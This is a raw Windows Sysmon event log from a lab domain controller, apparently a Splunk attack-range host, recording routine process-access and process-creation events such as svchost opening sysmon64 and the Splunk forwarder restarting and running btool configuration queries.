13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006955Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006954Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006953Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006952Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006951Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E8-5FCF-1201-000000009101}4216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006950Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.184{10ACEC4A-85E5-5FCF-0801-000000009101}42803180C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{10ACEC4A-85E8-5FCF-1201-000000009101}4216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+17249|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+137ff|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006949Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.187{10ACEC4A-85E8-5FCF-1201-000000009101}4216C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E5-5FCF-0801-000000009101}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=3080 10341000x80000000000000006948Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:52.168{10ACEC4A-85E5-5FCF-0801-000000009101}42803180C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+457e6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+460cb|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+453d6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d925|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007254Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-2A01-000000009101}4944C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007253Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007252Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007251Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007250Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007249Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007248Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007247Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007246Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007245Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-2A01-000000009101}4944C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007244Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007243Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-85E9-5FCF-2901-000000009101}44282284C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85E9-5FCF-2A01-000000009101}4944C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007242Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.875{10ACEC4A-85E9-5FCF-2A01-000000009101}4944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85E9-5FCF-2901-000000009101}4428C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000007241Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-2901-000000009101}4428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007240Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007239Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007238Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007237Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.870{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007236Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 